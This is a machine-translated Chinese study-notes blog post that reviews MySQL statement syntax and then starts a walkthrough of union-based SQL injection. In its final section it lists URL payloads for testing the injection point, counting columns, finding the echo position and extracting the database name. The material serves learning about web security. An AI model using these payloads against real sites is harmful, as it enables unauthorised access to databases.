当前位置：网站首页>SQL injection -day16

SQL injection -day16

2022-07-03 18:04:00 【kanna_ bush_ t】

3、 ... and 、Mysql Inject

3.2 sentence

insert：

insert into Table name ( Field name 1, Field name 2, Field name 3......) values( value 1, value 2, value 3......);

delete：

delete from Table name where Conditions ;// Roll back

For large table ：

truncate table Table name ;// Cannot roll back , Will be lost forever

update：

update Table name set Field name 1= value 1, Field name 2= value 2,......where Conditions ;

select：

select Field 1, Field 2,...... from + Table name where + Conditions ;

between and：

select * from users where id between 2 and 8;

select * from users where id >=2 and id <=8;

in not in：

select password from users where id not in(5,8);

Finger check to find out id It's not equal to 5 and id It's not equal to 8 The password of the user （ notes ： No 5~8,in Then it's not an interval ）

like：（% Represents any number of characters _ Represents any character ）

select username from users where username like '%b%';

// Point to find the letters in the user name b Username

select username from users where username like '_a%';

// Point out that the second letter in the user name is a Username

select username from users where username like '%b';

// Point to find out that the last letter in the user name is b Username

select username from users where username like '%\_%';

// Point to find the underlined user name _ Username

( notes ： Special characters need to be escaped )

order by:

select username from users order by Field name ;

( notes ： The default is ascending )

Specify ascending order ：asc

select username from users order by Field name asc;

Specify descending order ：desc

select username from users order by Field name desc;

Dual demand ：

select username from users order by Field name 1 desc, Field name 2 asc;

Group function :

select sum(grade) from users;
select avg(grade) from users;
select max(grade) from users;
select min(grade) from users;

Empty processing function :

select sum(ifnull(salary,0)*12), from crew;

Ask for the sum of one year's salary , When the salary is NULL when , Be used as a 0 To deal with it

count(*) And count:

count(*) : Count the total number of records , Instead of counting the data in a field , Field independent

count( A specific field )： The specific statistical field is not NULL Total of

String data sum,avg by 0,max,min Take by letter size
The grouping function will automatically ignore NULL
Mathematical operations If any NULL Participate in , The result is NULL
Grouping functions cannot appear directly in where Back , as a result of group by Is in where Executed after statement execution
Grouping functions can be combined

group by And having:

group by： Group by a field or fields

having： Filter the data after grouping again , namely having Must be with the group by Use... In the back

select max(grade) from students group by classes;

// First group according to the class , Then find out the grades of the students with the highest grades in each class

Grouping functions are generally similar to group by A combination of , And any grouping function （count,sum,avg,max,min） all

When one sql The statement did not group by when , The whole table will form a group

When sql Use in statement group by when ,select After that, you can only follow the fields or grouping functions that participate in grouping

( notes ： In fact, mysql in , You can use and execute , But it doesn't make sense ; And because the Oracle Than Mysql Be more strict )

distinct duplicate removal :

distinct keyword Remove duplicate records

select distinct job from company;

// Query the positions in the company

Statement execution order :

select 5 Number ： Pick out the data that meets the conditions
from 1 Number ： Set the table
where 2 Number ： Filter raw data
group by 3 Number ： Grouping
having 4 Number ： Filter the data again
order by 6 Number ： Sort

inner join:

select a.ename,b.dname from emp a join dept b on a.deptno=b.deptno;

left/right join:

select dname,ename from dept a left join emp b on a.deptno=b.deptno;

or sentence ： Execute when the previous statement does not conform to the situation or there is an error or Later

Four 、union Joint injection ( The single quotation mark closed character type is taken as an example )

4.1 Injection judgment

?id=1'
?id=1'

4.2 order by Inquire about

?id=1' order by x--+
?id=1' order by x#-> Commonly used %23 Instead of 
// among x Which column does the input number represent , Use dichotomy to narrow the scope ,x Then there are two minus signs and plus signs , For comments

4.3 Determine the echo position , Take three columns as an example

?id=-1' union select 1,2,3--+
?id=0' union select 1,2,3--+
?id=1' and 1=2 union select 1,2,3--+
// The front is to deny  id=1  Echo of , Prevent others  sql  Statement only  limit 0,1
// In this way, we can't view the information we want

4.4 Echo position injection sql sentence

?id=-1' union select 1,(select database()),3--+

原网站

版权声明
本文为[kanna_ bush_ t]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/02/202202150304578990.html